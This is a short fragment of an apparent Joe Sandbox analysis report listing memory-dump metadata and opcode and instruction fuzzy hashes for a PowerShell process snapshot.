                                                                                                • Source File: 00000003.00000002.2109723212.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45